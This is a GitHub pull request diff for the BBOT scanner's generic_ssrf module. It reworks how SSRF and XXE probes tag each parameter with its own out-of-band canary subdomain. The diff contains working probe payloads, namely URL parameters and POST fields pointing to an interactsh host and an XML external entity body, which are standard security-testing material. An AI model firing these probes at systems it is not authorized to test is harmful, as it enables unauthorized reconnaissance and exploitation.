Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Refactor generic_ssrf module and add parameter tracking #2141

Closed
wants to merge 4 commits into from
Closed
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
93 changes: 54 additions & 39 deletions bbot/modules/generic_ssrf.py
Original file line number Diff line number Diff line change
Expand Up @@ -37,10 +37,10 @@
class BaseSubmodule:
technique_description = "base technique description"
severity = "INFO"
paths = None
paths = []

def __init__(self, parent_module):
self.parent_module = parent_module
def __init__(self, generic_ssrf):
self.generic_ssrf = generic_ssrf
self.test_paths = self.create_paths()

def set_base_url(self, event):
Expand All @@ -51,30 +51,30 @@ def create_paths(self):

async def test(self, event):
base_url = self.set_base_url(event)

for test_path in self.test_paths:
subdomain_tag = self.parent_module.helpers.rand_string(4)
test_path_prepared = test_path.replace(
"SSRF_CANARY", f"{subdomain_tag}.{self.parent_module.interactsh_domain}"
)
test_url = f"{base_url}{test_path_prepared}"
self.parent_module.debug(f"Sending request to URL: {test_url}")
r = await self.parent_module.helpers.curl(url=test_url)
if r:
self.process(event, r, subdomain_tag)
for test_path_result in self.test_paths:
for lower in [True, False]:
test_path = test_path_result[0]
if lower:
test_path = test_path.lower()
subdomain_tag = test_path_result[1]
test_url = f"{base_url}{test_path}"
self.generic_ssrf.debug(f"Sending request to URL: {test_url}")
r = await self.generic_ssrf.helpers.curl(url=test_url)
if r:
self.process(event, r, subdomain_tag)

def process(self, event, r, subdomain_tag):
response_token = self.parent_module.interactsh_domain.split(".")[0][::-1]
response_token = self.generic_ssrf.interactsh_domain.split(".")[0][::-1]
if response_token in r:
read_response = True
echoed_response = True
else:
read_response = False
echoed_response = False

self.parent_module.interactsh_subdomain_tags[subdomain_tag] = (
self.generic_ssrf.interactsh_subdomain_tags[subdomain_tag] = (
event,
self.technique_description,
self.severity,
read_response,
echoed_response,
)


Expand All @@ -86,15 +86,15 @@ def set_base_url(self, event):
return event.data

def create_paths(self):
query_string = ""
for param in ssrf_params:
query_string += f"{param}=http://SSRF_CANARY&"

query_string_lower = ""
test_paths = []
for param in ssrf_params:
query_string_lower += f"{param.lower()}=http://SSRF_CANARY&"

return [f"?{query_string.rstrip('&')}", f"?{query_string_lower.rstrip('&')}"]
query_string = ""
subdomain_tag = self.generic_ssrf.helpers.rand_string(4)
ssrf_canary = f"{subdomain_tag}.{self.generic_ssrf.interactsh_domain}"
self.generic_ssrf.parameter_subdomain_tags_map[subdomain_tag] = param
query_string += f"{param}=http://{ssrf_canary}&"
test_paths.append((f"?{query_string.rstrip('&')}",subdomain_tag))
return test_paths


class Generic_SSRF_POST(BaseSubmodule):
Expand All @@ -107,21 +107,23 @@ def set_base_url(self, event):
async def test(self, event):
test_url = f"{event.data}"

subdomain_tag = self.parent_module.helpers.rand_string(4, digits=False)

post_data = {}
for param in ssrf_params:
post_data[param] = f"http://{subdomain_tag}.{self.parent_module.interactsh_domain}"
subdomain_tag = self.generic_ssrf.helpers.rand_string(4, digits=False)
self.generic_ssrf.parameter_subdomain_tags_map[subdomain_tag] = param
post_data[param] = f"http://{subdomain_tag}.{self.generic_ssrf.interactsh_domain}"

subdomain_tag_lower = self.parent_module.helpers.rand_string(4, digits=False)
subdomain_tag_lower = self.generic_ssrf.helpers.rand_string(4, digits=False)
post_data_lower = {
k.lower(): f"http://{subdomain_tag_lower}.{self.parent_module.interactsh_domain}"
k.lower(): f"http://{subdomain_tag_lower}.{self.generic_ssrf.interactsh_domain}"
for k, v in post_data.items()
}

post_data_list = [(subdomain_tag, post_data), (subdomain_tag_lower, post_data_lower)]

for tag, pd in post_data_list:
r = await self.parent_module.helpers.curl(url=test_url, method="POST", post_data=pd)
r = await self.generic_ssrf.helpers.curl(url=test_url, method="POST", post_data=pd)
self.process(event, r, tag)


Expand All @@ -131,17 +133,17 @@ class Generic_XXE(BaseSubmodule):
paths = None

async def test(self, event):
rand_entity = self.parent_module.helpers.rand_string(4, digits=False)
subdomain_tag = self.parent_module.helpers.rand_string(4, digits=False)
rand_entity = self.generic_ssrf.helpers.rand_string(4, digits=False)
subdomain_tag = self.generic_ssrf.helpers.rand_string(4, digits=False)

post_body = f"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY {rand_entity} SYSTEM "http://{subdomain_tag}.{self.parent_module.interactsh_domain}" >
<!ENTITY {rand_entity} SYSTEM "http://{subdomain_tag}.{self.generic_ssrf.interactsh_domain}" >
]>
<foo>&{rand_entity};</foo>"""
test_url = event.parsed_url.geturl()
r = await self.parent_module.helpers.curl(
r = await self.generic_ssrf.helpers.curl(
url=test_url, method="POST", raw_body=post_body, headers={"Content-type": "application/xml"}
)
if r:
Expand All @@ -160,6 +162,7 @@ class generic_ssrf(BaseModule):
async def setup(self):
self.submodules = {}
self.interactsh_subdomain_tags = {}
self.parameter_subdomain_tags_map = {}
self.severity = None
self.generic_only = self.config.get("generic_only", False)

Expand Down Expand Up @@ -190,22 +193,34 @@ async def handle_event(self, event):

async def interactsh_callback(self, r):
full_id = r.get("full-id", None)
subdomain_tag = full_id.split(".")[0]

if full_id:
if "." in full_id:
match = self.interactsh_subdomain_tags.get(full_id.split(".")[0])
match = self.interactsh_subdomain_tags.get(subdomain_tag)
if not match:
return
matched_event = match[0]
matched_technique = match[1]
matched_severity = match[2]
matched_read_response = str(match[3])
matched_echoed_response = str(match[3])

# Check if any SSRF parameter is in the DNS request
triggering_param = self.parameter_subdomain_tags_map.get(subdomain_tag, None)
description = f"Out-of-band interaction: [{matched_technique}]"
if triggering_param:
self.debug(f"Found triggering parameter: {triggering_param}")
description += f" [Triggering Parameter: {triggering_param}]"
description += f" [{r.get('protocol').upper()}] Echoed Response: {matched_echoed_response}"

self.debug(f"Emitting event with description: {description}") # Debug the final description

await self.emit_event(
{
"severity": matched_severity,
"host": str(matched_event.host),
"url": matched_event.data,
"description": f"Out-of-band interaction: [{matched_technique}] [{r.get('protocol').upper()}] Read Response: {matched_read_response}",
"description": description,
},
"VULNERABILITY",
matched_event,
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -42,7 +42,7 @@ async def setup_after_prep(self, module_test):

def check(self, module_test, events):
assert any(
e.type == "VULNERABILITY" and "Out-of-band interaction: [Generic SSRF (GET)]" in e.data["description"]
e.type == "VULNERABILITY" and "Out-of-band interaction: [Generic SSRF (GET)]" and "[Triggering Parameter: Dest]" in e.data["description"]
for e in events
), "Failed to detect Generic SSRF (GET)"
assert any(
Expand Down
Loading